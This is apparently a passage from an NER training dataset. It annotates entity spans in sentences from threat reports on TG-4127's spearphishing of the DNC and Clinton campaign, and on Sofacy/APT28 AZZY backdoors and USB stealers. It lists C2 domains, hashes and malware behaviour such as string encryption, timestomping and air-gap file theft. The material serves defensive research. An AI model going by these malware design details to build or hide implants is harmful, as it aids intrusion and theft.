Democratic party's governing body , the Democratic National Committee ( DNC ) , uses the dnc.org domain for its staff email .", "spans": [{"start": 49, "end": 78, "label": "Organization"}, {"start": 81, "end": 84, "label": "Organization"}, {"start": 98, "end": 105, "label": "Indicator"}, {"start": 127, "end": 132, "label": "System"}]} {"text": "Between mid-March and mid-April 2016 , TG-4127 created 16 short links targeting nine dnc.org email accounts .", "spans": [{"start": 39, "end": 46, "label": "Organization"}, {"start": 85, "end": 92, "label": "Indicator"}, {"start": 93, "end": 98, "label": "System"}]} {"text": "CTU researchers identified the owners of three of these accounts ; two belonged to the DNC 's secretary emeritus , and one belonged to the communications director .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 87, "end": 90, "label": "Organization"}]} {"text": "Four of the 16 short links were clicked , three by the senior staff members .", "spans": []} {"text": "As of this publication , dnc.org does not use the Google Apps Gmail email service .", "spans": [{"start": 25, "end": 32, "label": "Indicator"}, {"start": 50, "end": 56, "label": "Organization"}, {"start": 68, "end": 73, "label": "System"}]} {"text": "However , because dnc.org email accounts were targeted in the same way as hillaryclinton.com accounts , it is likely that dnc.org did use Gmail at that time and later moved to a different service .", "spans": [{"start": 18, "end": 25, "label": "Indicator"}, {"start": 26, "end": 31, "label": "System"}, {"start": 74, "end": 92, "label": "Indicator"}, {"start": 122, "end": 129, "label": "Indicator"}, {"start": 138, "end": 143, "label": "System"}]} {"text": "CTU researchers do not have evidence that these spearphishing emails are connected to the DNC network compromise that was revealed on June 14 .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 62, "end": 68, "label": "System"}, {"start": 90, "end": 93, 
"label": "Organization"}]} {"text": "However , a coincidence seems unlikely , and CTU researchers suspect that TG-4127 used the spearphishing emails or similar techniques to gain an initial foothold in the DNC network .", "spans": [{"start": 45, "end": 48, "label": "Organization"}, {"start": 74, "end": 81, "label": "Organization"}, {"start": 105, "end": 111, "label": "System"}, {"start": 169, "end": 172, "label": "Organization"}]} {"text": "CTU researchers identified TG-4127 targeting 26 personal gmail.com accounts belonging to individuals linked to the Hillary for America campaign , the DNC , or other aspects of U.S. national politics .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 27, "end": 34, "label": "Organization"}, {"start": 150, "end": 153, "label": "Organization"}]} {"text": "Five of the individuals also had a hillaryclinton.com email account that was targeted by TG-4127 .", "spans": [{"start": 35, "end": 53, "label": "Indicator"}, {"start": 54, "end": 59, "label": "System"}, {"start": 89, "end": 96, "label": "Organization"}]} {"text": "Many of these individuals held communications , media , finance , or policy roles .", "spans": []} {"text": "They include the director of speechwriting for Hillary for America and the deputy director office of the chair at the DNC .", "spans": [{"start": 118, "end": 121, "label": "Organization"}]} {"text": "TG-4127 created 150 short links targeting this group .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "As of this publication , 40 of the links have been clicked at least once .", "spans": []} {"text": "Although the 2015 campaign did not focus on individuals associated with U.S. politics , open-source evidence suggests that TG-4127 targeted individuals connected to the U.S. 
White House in early 2015 .", "spans": [{"start": 123, "end": 130, "label": "Organization"}]} {"text": "The threat group also reportedly targeted the German parliament and German Chancellor Angela Merkel's Christian Democratic Union party .", "spans": []} {"text": "CTU researchers have not observed TG-4127 use this technique ( using Bitly short links ) to target the U.S. Republican party or the other U.S. presidential candidates whose campaigns were active between mid-March and mid-May : Donald Trump , Bernie Sanders , Ted Cruz , Marco Rubio , and John Kasich .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 34, "end": 41, "label": "Organization"}, {"start": 69, "end": 74, "label": "System"}]} {"text": "However , the following email domains do not use Google mail servers and may have been targeted by other means :", "spans": [{"start": 24, "end": 29, "label": "System"}, {"start": 49, "end": 55, "label": "Organization"}]} {"text": "gop.com \u2014 used by the Republican National Committee , donaldjtrump.com \u2014 used by the Donald Trump campaign , johnkasich.com \u2014 used by the John Kasich campaign .", "spans": [{"start": 0, "end": 7, "label": "Indicator"}, {"start": 22, "end": 51, "label": "Organization"}, {"start": 54, "end": 70, "label": "Indicator"}, {"start": 109, "end": 123, "label": "Indicator"}]} {"text": "Access to targets' Google accounts allows TG-4127 to review internal emails and potentially access other Google Apps services used by these organizations , such as Google Drive .", "spans": [{"start": 19, "end": 25, "label": "Organization"}, {"start": 42, "end": 49, "label": "Organization"}, {"start": 69, "end": 75, "label": "System"}, {"start": 105, "end": 111, "label": "Organization"}, {"start": 164, "end": 170, "label": "Organization"}, {"start": 171, "end": 176, "label": "System"}]} {"text": "In addition to the value of the intelligence , the threat actors could also exploit this access for other malicious activity , such as 
generating spearphishing emails from internal email addresses to compromise the organizations' networks with malware .", "spans": [{"start": 160, "end": 166, "label": "System"}, {"start": 181, "end": 186, "label": "System"}]} {"text": "The Russian government views the U.S. as a strategic rival and is known to task its intelligence agencies with gathering confidential information about individuals and organizations close to the center of power in the U.S. Individuals working for the Hillary for America campaign could have information about proposed policies for a Clinton presidency , including foreign-policy positions , which would be valuable to the Russian government .", "spans": []} {"text": "Information about travel plans and campaign scheduling could provide short-term opportunities for other intelligence operations .", "spans": []} {"text": "Long-term access to email accounts of senior campaign advisors , who may be appointed to staff positions in a Clinton administration , could provide TG-4127 and the Russian government with access to those individual's accounts .", "spans": [{"start": 20, "end": 25, "label": "System"}, {"start": 149, "end": 156, "label": "Organization"}]} {"text": "While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government .", "spans": [{"start": 6, "end": 13, "label": "Organization"}]} {"text": "Non-governmental political organizations may provide access to desirable national policy information , especially foreign policy , but may not have the same level of protection and security as governmental organizations .", "spans": []} {"text": "Targeting individuals linked to presidential campaigns could represent an intelligence \u2018 long game ,' as establishing access to potential U.S. 
administration staff before they are appointed could be easier than targeting them when they are established in the White House .", "spans": [{"start": 259, "end": 270, "label": "Organization"}]} {"text": "Access to an individual's personal or corporate email account provides a substantial amount of useful intelligence , and threat actors could also leverage the access to launch additional attacks to penetrate the network of an associated organization .", "spans": [{"start": 48, "end": 53, "label": "System"}]} {"text": "Users rarely check the full URL associated with short links , so threat groups can use URL-shortening services to effectively hide malicious URLs .", "spans": []} {"text": "Threat actors can use the services' detailed statistics about which links were clicked when , and from what location , to track the success of a spearphishing campaign .", "spans": []} {"text": "A single compromised account could allow TG-4127 to achieve its operational goals .", "spans": [{"start": 41, "end": 48, "label": "Organization"}]} {"text": "CTU researchers recommend that clients take appropriate precautions to minimize the risk of these types of attacks :", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "Educate users about the risks of spearphishing emails .", "spans": [{"start": 47, "end": 53, "label": "System"}]} {"text": "Use caution and exercise due diligence when faced with a shortened link , especially in unsolicited email messages .", "spans": [{"start": 100, "end": 105, "label": "System"}]} {"text": "Pasting Bitly URLs , appended with a plus sign , into the address bar of a web browser reveals the full URL .", "spans": [{"start": 8, "end": 13, "label": "System"}]} {"text": "Sofacy APT hits high profile targets with updated toolset .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "Sofacy ( also known as \u201c Fancy Bear \u201d , \u201c Sednit \u201d , \u201c STRONTIUM \u201d and \u201c APT28 \u201d ) is an advanced 
threat group that has been active since around 2008 , targeting mostly military and government entities worldwide , with a focus on NATO countries .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 25, "end": 35, "label": "Organization"}, {"start": 42, "end": 48, "label": "Organization"}, {"start": 55, "end": 64, "label": "Organization"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 230, "end": 234, "label": "Organization"}]} {"text": "More recently , we have also seen an increase in activity targeting Ukraine .", "spans": []} {"text": "Back in 2011-2012 , the group used a relatively tiny implant ( known as \u201c Sofacy \u201d or SOURFACE ) as its first stage malware .", "spans": [{"start": 74, "end": 80, "label": "Organization"}, {"start": 86, "end": 94, "label": "Malware"}]} {"text": "The implant shared certain similarities with the old Miniduke implants .", "spans": [{"start": 53, "end": 61, "label": "Organization"}]} {"text": "This led us to believe the two groups were connected , at least to begin with , although it appears they parted ways in 2014 , with the original Miniduke group switching to the CosmicDuke implant .", "spans": [{"start": 145, "end": 153, "label": "Organization"}, {"start": 177, "end": 187, "label": "Malware"}]} {"text": "At some point during 2013 , the Sofacy group expanded its arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across four to five generations ) and a few others .", "spans": [{"start": 32, "end": 38, "label": "Organization"}, {"start": 113, "end": 122, "label": "System"}, {"start": 125, "end": 129, "label": "Malware"}, {"start": 136, "end": 142, "label": "Malware"}, {"start": 149, "end": 158, "label": "Malware"}, {"start": 163, "end": 171, "label": "Malware"}, {"start": 208, "end": 215, "label": "Malware"}, 
{"start": 228, "end": 232, "label": "Malware"}, {"start": 239, "end": 252, "label": "Malware"}, {"start": 255, "end": 260, "label": "Malware"}, {"start": 263, "end": 271, "label": "Malware"}]} {"text": "We \u2019ve seen quite a few versions of these implants and they were relatively widespread for a time .", "spans": []} {"text": "Sofacy \u2019s August 2015 attack wave .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "In the months leading up to August , the Sofacy group launched several waves of attacks relying on zero-day exploits in Microsoft Office , Oracle Sun Java , Adobe Flash Player and Windows itself .", "spans": [{"start": 41, "end": 47, "label": "Organization"}, {"start": 99, "end": 107, "label": "Vulnerability"}, {"start": 120, "end": 129, "label": "Organization"}, {"start": 130, "end": 136, "label": "System"}, {"start": 139, "end": 145, "label": "System"}, {"start": 150, "end": 154, "label": "System"}, {"start": 157, "end": 162, "label": "System"}, {"start": 163, "end": 168, "label": "System"}, {"start": 169, "end": 175, "label": "System"}, {"start": 180, "end": 187, "label": "System"}]} {"text": "For instance , its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox .", "spans": [{"start": 19, "end": 27, "label": "Malware"}, {"start": 60, "end": 65, "label": "System"}, {"start": 66, "end": 74, "label": "Vulnerability"}, {"start": 86, "end": 93, "label": "System"}, {"start": 94, "end": 97, "label": "System"}]} {"text": "The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 110, "end": 114, "label": "System"}, {"start": 115, "end": 123, "label": "Vulnerability"}, {"start": 126, "end": 139, "label": "Vulnerability"}]} {"text": "While the JHUHUGIT ( and 
more recently , \u201c JKEYSKW \u201d ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZYTrojan .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 43, "end": 50, "label": "Malware"}, {"start": 83, "end": 89, "label": "Organization"}, {"start": 218, "end": 228, "label": "Malware"}]} {"text": "The first versions of the new AZZY implant appeared in August of this year .", "spans": [{"start": 30, "end": 34, "label": "Malware"}]} {"text": "During a high profile incident we investigated , our products successfully detected and blocked a \u201c standard \u201d Sofacy \u201c AZZY \u201d sample that was used to target a range of defense contractors .", "spans": [{"start": 111, "end": 117, "label": "Organization"}, {"start": 120, "end": 124, "label": "Malware"}]} {"text": "The sample used in this attack ( MD5 A96F4B8AC7AA9DBF4624424B7602D4F7 , compiled July 29th , 2015 ) was a pretty standard Sofacy x64 AZZY implant , which has the internal name \u201c advshellstore.dll \u201d .", "spans": [{"start": 37, "end": 69, "label": "Indicator"}, {"start": 122, "end": 128, "label": "Organization"}, {"start": 133, "end": 137, "label": "Malware"}, {"start": 178, "end": 195, "label": "Indicator"}]} {"text": "Interestingly , the fact that the attack was blocked didn\u2019t appear to stop the Sofacy team .", "spans": [{"start": 79, "end": 85, "label": "Organization"}]} {"text": "Just an hour and a half later they had compiled and delivered another AZZY x64 backdoor ( md5: 9D2F9E19DB8C20DC0D20D50869C7A373 , compiled August 4th , 2015 ) .", "spans": [{"start": 70, "end": 74, "label": "Malware"}, {"start": 95, "end": 127, "label": "Indicator"}]} {"text": "This was no longer detectable with static signatures by our product .", "spans": []} {"text": "However , it was detected dynamically by the host intrusion prevention subsystem when it appeared in the 
system and was executed .", "spans": []} {"text": "This recurring , blindingly-fast Sofacy attack attracted our attention as neither sample was delivered through a zero-day vulnerability \u2014 instead , they appeared to be downloaded and installed by another malware .", "spans": [{"start": 33, "end": 39, "label": "Organization"}, {"start": 113, "end": 121, "label": "Vulnerability"}]} {"text": "This separate malware was installed by an unknown attack as \u201c AppData\\Local\\Microsoft\\Windows\\msdeltemp.dll \u201d ( md5: CE8B99DF8642C065B6AF43FDE1F786A3 ) .", "spans": [{"start": 62, "end": 107, "label": "Indicator"}, {"start": 117, "end": 149, "label": "Indicator"}]} {"text": "The top level malware , CE8B99DF8642C065B6AF43FDE1F786A3 ( named by its authors \u201c msdeltemp.dll \u201d according to internal strings , and compiled July 28th , 2015 ) is a rare type of the Sofacy AZZY implant .", "spans": [{"start": 24, "end": 56, "label": "Indicator"}, {"start": 82, "end": 95, "label": "Indicator"}, {"start": 184, "end": 190, "label": "Organization"}, {"start": 191, "end": 195, "label": "Malware"}]} {"text": "It has been modified to drop a separate C&C helper , ( md5: 8C4D896957C36EC4ABEB07B2802268B9 ) as \u201c tf394kv.dll \u201c .", "spans": [{"start": 40, "end": 43, "label": "System"}, {"start": 60, "end": 92, "label": "Indicator"}, {"start": 100, "end": 111, "label": "Indicator"}]} {"text": "The dropped \u201c tf394kv.dll \u201d file is an external C&C communications library , compiled on July 24th , 2015 and used by the main backdoor for all Internet-based communications .", "spans": [{"start": 14, "end": 25, "label": "Indicator"}, {"start": 48, "end": 51, "label": "System"}]} {"text": "This code modification marks an unusual departure from the typical AZZY backdoors , with its C&C communication functions moved to an external DLL file .", "spans": [{"start": 67, "end": 81, "label": "Malware"}, {"start": 93, "end": 96, "label": "System"}, {"start": 142, "end": 
145, "label": "System"}]} {"text": "In the past , the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry , instead of storing it in the malware itself , so this code modularisation follows the same line of thinking .", "spans": [{"start": 18, "end": 24, "label": "Organization"}, {"start": 53, "end": 67, "label": "Malware"}, {"start": 77, "end": 80, "label": "System"}]} {"text": "In addition to the new AZZY backdoors with side-DLL for C&C , we observed a new set of data-theft modules deployed against victims by the Sofacy group .", "spans": [{"start": 23, "end": 37, "label": "Malware"}, {"start": 43, "end": 51, "label": "System"}, {"start": 56, "end": 59, "label": "System"}, {"start": 138, "end": 144, "label": "Organization"}]} {"text": "Among the most popular modern defense mechanisms against APTs are air-gaps \u2014 isolated network segments without Internet access , where sensitive data is stored .", "spans": []} {"text": "In the past , we \u2019ve seen groups such as Equation and Flame use malware to steal data from air-gapped networks .", "spans": [{"start": 41, "end": 49, "label": "Organization"}, {"start": 54, "end": 59, "label": "Organization"}]} {"text": "The Sofacy group uses such tools as well .", "spans": [{"start": 4, "end": 10, "label": "Organization"}]} {"text": "The first versions of these new USB stealer modules appeared around February 2015 and the latest appear to have been compiled in May 2015 .", "spans": [{"start": 32, "end": 43, "label": "System"}]} {"text": "Older versions of these USBSTEALER modules were previously described by our colleagues from ESET .", "spans": [{"start": 24, "end": 34, "label": "System"}, {"start": 92, "end": 96, "label": "Organization"}]} {"text": "One example of the new Sofacy USBSTEALER modules is 8b238931a7f64fddcad3057a96855f6c , which is named internally as msdetltemp.dll .", "spans": [{"start": 23, "end": 29, "label": "Organization"}, {"start": 30, "end": 40, "label": 
"System"}, {"start": 52, "end": 84, "label": "Indicator"}, {"start": 116, "end": 130, "label": "Indicator"}]} {"text": "This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them , depending on a set of rules defined by the attackers .", "spans": []} {"text": "The stolen data is copied into a hidden directory as \u201c %MYPICTURES%\\%volume serial number% \u201c , from where it can be exfiltrated by the attackers using one of the AZZY implants .", "spans": [{"start": 162, "end": 166, "label": "Malware"}]} {"text": "More details on the new USB stealers are available in the section on technical analysis .", "spans": [{"start": 24, "end": 27, "label": "System"}]} {"text": "Over the last year , the Sofacy group has increased its activity almost tenfold when compared to previous years , becoming one of the most prolific , agile and dynamic threat actors in the arena .", "spans": [{"start": 25, "end": 31, "label": "Organization"}]} {"text": "This activity spiked in July 2015 , when the group dropped two completely new exploits , an Office and Java zero-day .", "spans": [{"start": 92, "end": 98, "label": "System"}, {"start": 103, "end": 107, "label": "System"}, {"start": 108, "end": 116, "label": "Vulnerability"}]} {"text": "At the beginning of August , Sofacy began a new wave of attacks , focusing on defense-related targets .", "spans": [{"start": 29, "end": 35, "label": "Organization"}]} {"text": "As of November 2015 , this wave of attacks is ongoing .", "spans": []} {"text": "The attackers deploy a rare modification of the AZZY backdoor , which is used for the initial reconnaissance .", "spans": [{"start": 48, "end": 61, "label": "Malware"}]} {"text": "Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \u201c Mimikatz \u201d for lateral movement .", "spans": [{"start": 69, "end": 72, "label": "System"}, {"start": 123, "end": 
131, "label": "System"}]} {"text": "Two recurring characteristics of the Sofacy group that we keep seeing in its attacks are speed and the use of multi-backdoor packages for extreme resilience .", "spans": [{"start": 37, "end": 43, "label": "Organization"}]} {"text": "In the past , the group used droppers that installed both the SPLM and AZZY backdoors on the same machine .", "spans": [{"start": 62, "end": 66, "label": "Malware"}, {"start": 71, "end": 85, "label": "Malware"}]} {"text": "If one of them was detected , the other one provided the attacker with continued access .", "spans": []} {"text": "Internal name : DWN_DLL_MAIN.dll File format : PE32 DLL MD5: ce8b99df8642c065b6af43fde1f786a3 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.07.28 13:05:20 ( GMT ) .", "spans": [{"start": 16, "end": 32, "label": "Indicator"}, {"start": 52, "end": 55, "label": "System"}, {"start": 61, "end": 93, "label": "Indicator"}, {"start": 118, "end": 127, "label": "Organization"}, {"start": 128, "end": 141, "label": "System"}, {"start": 183, "end": 186, "label": "System"}]} {"text": "The library starts its main worker thread from the DllMain function .", "spans": []} {"text": "Most of the strings inside the module are encrypted with a homebrew XOR-based algorithm .", "spans": []} {"text": "In addition to that , API function names are reversed , presumably to avoid detection in memory .", "spans": []} {"text": "Once started , the code in the main thread resolves the basic API functions it needs and loads an additional library from the following location : \u201c %TEMP%\\tf394kv.dll \u201d .", "spans": [{"start": 149, "end": 167, "label": "Indicator"}]} {"text": "If this file is not present , it is recreated from a hardcoded encrypted array inside the body of the DLL .", "spans": [{"start": 102, "end": 105, "label": "System"}]} {"text": "Next , the module enters an infinite loop .", "spans": []} {"text": "Every five minutes it collects basic system 
information and sends it to the C2 server .", "spans": [{"start": 76, "end": 78, "label": "System"}]} {"text": "The main thread also spawns a separate thread for receiving new commands from the C2 servers .", "spans": [{"start": 82, "end": 84, "label": "System"}]} {"text": "Every 10 minutes , it sends a new request to the server .", "spans": []} {"text": "The server is expected to send back executable code and one of the following commands :", "spans": []} {"text": "Write a new file \u201c %LOCAL_APPDATA%\\dllhost.exe \u201d or \u201c %TEMP%\\dllhost.exe \u201d and execute it , then delete the file , Write a new file \u201c %LOCAL_APPDATA%\\sechost.dll \u201d or \u201c %TEMP%\\sechost.dll \u201d and call its first exported function using \u201c rundll32.exe \u201d or Windows API , then delete the file , Run shellcode provided by the server in a new thread While processing the commands , the backdoor logs all errors and execution results .", "spans": [{"start": 19, "end": 46, "label": "Indicator"}, {"start": 54, "end": 72, "label": "Indicator"}, {"start": 134, "end": 161, "label": "Indicator"}, {"start": 169, "end": 187, "label": "Indicator"}, {"start": 235, "end": 247, "label": "Indicator"}, {"start": 253, "end": 260, "label": "System"}]} {"text": "The module also reads the contents of the file \u201c %APPDATA%\\chkdbg.log \u201d and appends it to the results .", "spans": [{"start": 49, "end": 69, "label": "Indicator"}]} {"text": "It then sends the aggregated log back to the C2 server .", "spans": [{"start": 45, "end": 47, "label": "System"}]} {"text": "The module aborts the thread receiving C2 command after it fails to correctly execute commands more than six times in a row , i.e. 
if file or process creation fails .", "spans": [{"start": 39, "end": 41, "label": "System"}]} {"text": "The export called \u201c k \u201d is a wrapper for the \u201c LoadLibraryA \u201d API function .", "spans": []} {"text": "The export called \u201c SendDataToServer_2 \u201d does exactly what the name means : it encrypts all collected data , encodes it using Base64 encoding and calls its additional library to send the data to the C2 server .", "spans": [{"start": 199, "end": 201, "label": "System"}]} {"text": "The names of the C2 servers are hardcoded .", "spans": [{"start": 17, "end": 19, "label": "System"}]} {"text": "The two C&C \u2019s hardcoded in the configuration block of the main binary are :", "spans": [{"start": 8, "end": 11, "label": "System"}]} {"text": "intelnetservice.com intelsupport.net The export called \u201c Applicate \u201d runs a standard Windows application message loop until a \u201c WM_ENDSESSION \u201d message is received .", "spans": [{"start": 0, "end": 19, "label": "Indicator"}, {"start": 20, "end": 36, "label": "Indicator"}, {"start": 85, "end": 92, "label": "System"}]} {"text": "It then terminates the main thread .", "spans": []} {"text": "Internal name : snd.dll File format : PE32 DLL MD5: 8c4d896957c36ec4abeb07b2802268b9 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.07.24 12:07:27 ( GMT ) Exported functions :", "spans": [{"start": 16, "end": 23, "label": "Indicator"}, {"start": 43, "end": 46, "label": "System"}, {"start": 52, "end": 84, "label": "Indicator"}, {"start": 109, "end": 118, "label": "Organization"}, {"start": 119, "end": 132, "label": "System"}, {"start": 174, "end": 177, "label": "System"}]} {"text": "10001580: Init 10001620: InternetExchange 10001650: SendData This external library implements a simple Wininet-based transport for the main module .", "spans": []} {"text": "The strings inside the binary are encrypted using 3DES and XOR and reversed .", "spans": []} {"text": "The DllMain function 
initializes the library and resolves all required Windows API functions .", "spans": [{"start": 71, "end": 78, "label": "System"}]} {"text": "The \u201c Init \u201d export establishes connection to port 80 of a C2 server using Wininet API .", "spans": [{"start": 59, "end": 61, "label": "System"}, {"start": 75, "end": 82, "label": "System"}]} {"text": "The user agent string employed is \u201c MSIE 8.0 \u201d .", "spans": [{"start": 36, "end": 40, "label": "System"}]} {"text": "The \u201c SendData \u201d export sends a HTTP POST request using a hardcoded URI \u201c /store/ \u201c .", "spans": [{"start": 32, "end": 36, "label": "Indicator"}]} {"text": "The reply , if its length is not equal to six and its contents do not contain \u201c OK \u201d is returned back to the caller .", "spans": []} {"text": "The \u201c InternetExchange \u201d export closes the established connection and frees associated handles .", "spans": []} {"text": "Sofacy AZZY 4.3 dropper analysis File format : PE32 EXE File size : 142,336 bytes MD5: c3ae4a37094ecfe95c2badecf40bf5bb Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.02.10 10:01:59 ( GMT ) Most of the strings and data in the file are encrypted using 3DES and XOR .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 7, "end": 11, "label": "Malware"}, {"start": 52, "end": 55, "label": "System"}, {"start": 87, "end": 119, "label": "Indicator"}, {"start": 144, "end": 153, "label": "Organization"}, {"start": 154, "end": 167, "label": "System"}, {"start": 209, "end": 212, "label": "System"}]} {"text": "The code makes use of the Windows Crypto API for 3DES and the decryption key is stored as a standard Windows PUBLICKEYSTRUC structure .", "spans": [{"start": 26, "end": 33, "label": "System"}, {"start": 34, "end": 40, "label": "System"}, {"start": 101, "end": 108, "label": "System"}, {"start": 109, "end": 123, "label": "System"}]} {"text": "First , it creates a new directory : \u201c 
%LOCAL_APPDATA%\\Microsoft\\Windows \u201d .", "spans": [{"start": 39, "end": 72, "label": "System"}]} {"text": "If the directory creation fails it tries to install into \u201c %TEMP% \u201d directory instead .", "spans": []} {"text": "Next it writes a hardcoded binary from its body to \u201c msdeltemp.dll \u201d into the target directory .", "spans": [{"start": 53, "end": 66, "label": "Indicator"}]} {"text": "If the file exists it then moves it to \u201c __tmpdt.tmp \u201d in the same directory and continues the installation .", "spans": [{"start": 41, "end": 52, "label": "Indicator"}]} {"text": "Sets file creation timestamp to that of \u201c %SYSTEM%\\sfc.dll \u201d .", "spans": [{"start": 42, "end": 58, "label": "Indicator"}]} {"text": "Finally , the program removes itself by starting the following command : \u201c cmd /c DEL %path to self% \u201c The MD5 of the dropped file is f6f88caf49a3e32174387cacfa144a89 .", "spans": [{"start": 75, "end": 78, "label": "System"}, {"start": 134, "end": 166, "label": "Indicator"}]} {"text": "Dropper payload \u2013 downloader DLL Internal name : msdetltemp.dll File format : PE32 DLL File size : 73 728 bytes MD5: f6f88caf49a3e32174387cacfa144a89 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.02.10 07:20:02 ( GMT ) Exported functions :", "spans": [{"start": 29, "end": 32, "label": "System"}, {"start": 49, "end": 63, "label": "Indicator"}, {"start": 83, "end": 86, "label": "System"}, {"start": 117, "end": 149, "label": "Indicator"}, {"start": 174, "end": 183, "label": "Organization"}, {"start": 184, "end": 197, "label": "System"}, {"start": 239, "end": 242, "label": "System"}]} {"text": "10002B55: Applicate Most of the strings inside the binary are encrypted using a homebrew XOR-based algorithm and reversed .", "spans": []} {"text": "The library is an older version of the \u201c DWN_DLL_MAIN.dll \u201d ( md5: ce8b99df8642c065b6af43fde1f786a3 ) .", "spans": [{"start": 41, "end": 57, "label": "Indicator"}, 
{"start": 67, "end": 99, "label": "Indicator"}]} {"text": "The DllMain function is identical and starts the main thread ; the \u201c Applicate \u201d function is identical to the one in the newer library .", "spans": []} {"text": "This version of the module does not rely on an external transport DLL for communicating with its C2 servers ; instead it directly uses Wininet API functions .", "spans": [{"start": 66, "end": 69, "label": "System"}, {"start": 97, "end": 99, "label": "System"}, {"start": 135, "end": 142, "label": "System"}]} {"text": "The module contains the following hardcoded C2 server names :", "spans": [{"start": 44, "end": 46, "label": "System"}]} {"text": "drivres-update.info softupdates.info The module uses a hardcoded URL ( \u201c /check/ \u201c ) for sending HTTP POST requests to its C2 servers .", "spans": [{"start": 0, "end": 19, "label": "Indicator"}, {"start": 20, "end": 36, "label": "Indicator"}, {"start": 97, "end": 101, "label": "Indicator"}, {"start": 123, "end": 125, "label": "System"}]} {"text": "Sofacy APT hits high profile targets with updated toolset .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "File collection module ( \u201c USB Stealer \u201d ) Internal name : msdetltemp.dll ( from resources ) File size : 50,176 bytes File format : PE32 EXE MD5: 0369620eb139c3875a62e36bb7abdae8 Linker version : 10.0 , Microsoft Visual Studio Linker timestamp : 2015.02.09 11:48:01 ( GMT ) Most of the strings inside the binary are encrypted using 3DES and XOR and reversed .", "spans": [{"start": 27, "end": 38, "label": "System"}, {"start": 59, "end": 73, "label": "Indicator"}, {"start": 137, "end": 140, "label": "System"}, {"start": 146, "end": 178, "label": "Indicator"}, {"start": 203, "end": 212, "label": "Organization"}, {"start": 213, "end": 226, "label": "System"}, {"start": 268, "end": 271, "label": "System"}]} {"text": "The program creates the mutex \u201c mtx \u201d and an event named \u201c WerTyQ34C \u201d .", 
"spans": []} {"text": "Upon start , it creates a window with the class name \u201c Hello \u201d and title \u201c Program \u201d , subscribes for device arrival notifications for that window and enters a standard Windows message processing loop .", "spans": [{"start": 169, "end": 176, "label": "System"}]} {"text": "The message processing function waits for the WM_DEVICECHANGE event and starts a new thread on its arrival .", "spans": []} {"text": "The module inspects every new disk volume attached to the system .", "spans": []} {"text": "For every disk it creates a \u201c stash \u201d directory in \u201c %root stash directory location%\\%volume serial number in hex% \u201d with attributes FILE_ATTRIBUTE_HIDDEN and FILE_ATTRIBUTE_SYSTEM .", "spans": []} {"text": "The root stash directory location may be read from the configuration file or set to the default location which is \u201c %MYPICTURES% \u201d .", "spans": []} {"text": "Then , it traverses the filesystem of the volume looking for files .", "spans": []} {"text": "Depending on the settings read from the configuration file , the scope may be narrowed to files with particular extensions and/or files created after a specified date .", "spans": []} {"text": "It is worth noting that if the source file location contains the string \u201c System Volume Information\\S-1-5-21-1315235578-283289242\\ \u201d , then the file is deleted after copying to the \u201c stash \u201d directory .", "spans": []} {"text": "There are known related samples that are able to create such directories on removable drives , i.e . 
the sample with md5: 8cb08140ddb00ac373d29d37657a03cc .", "spans": [{"start": 122, "end": 154, "label": "Indicator"}]} {"text": "The configuration file is loaded from the same directory as the module and is expected to have a name \u201c NvCpld.dat \u201c .", "spans": [{"start": 104, "end": 114, "label": "Indicator"}]} {"text": "It is a text file that may contain the following configuration parameters :", "spans": []} {"text": "Path \u2013 location of the root \u201c stash \u201d directory Ext \u2013 search for files with one of these extensions only Date \u2013 search for files not earlier than this date Internal name : NvCpld.dll ( from export table ) , msdetltemp.dll ( from resources ) , IGFSRVC.dll ( from resources ) File format : PE32 DLL File size : 76,288 bytes MD5s : 8b238931a7f64fddcad3057a96855f6c , ce151285e8f0e7b2b90162ba171a4b90 Linker version : 11.0 , Microsoft Visual Studio Linker timestamps : 2015.05.29 11:20:32 ( GMT ) , 2006.11.25 04:39:15 ( GMT ) Exported functions :", "spans": [{"start": 172, "end": 182, "label": "Indicator"}, {"start": 207, "end": 221, "label": "Indicator"}, {"start": 243, "end": 254, "label": "Indicator"}, {"start": 293, "end": 296, "label": "System"}, {"start": 329, "end": 361, "label": "Indicator"}, {"start": 364, "end": 396, "label": "Indicator"}, {"start": 421, "end": 430, "label": "Organization"}, {"start": 431, "end": 444, "label": "System"}, {"start": 487, "end": 490, "label": "System"}, {"start": 517, "end": 520, "label": "System"}]} {"text": "10002500: NvMswt 10002860: NvReg 10002880: NvStart 10002A80: NvStop This library is a newer version of the file collection module ( md5: 0369620eb139c3875a62e36bb7abdae8 ) wrapped in a DLL file .", "spans": [{"start": 137, "end": 169, "label": "Indicator"}, {"start": 185, "end": 188, "label": "System"}]} {"text": "There are two known variants of this module ; they only differ in timestamp values and version information in the resource section .", "spans": []} {"text": "The 
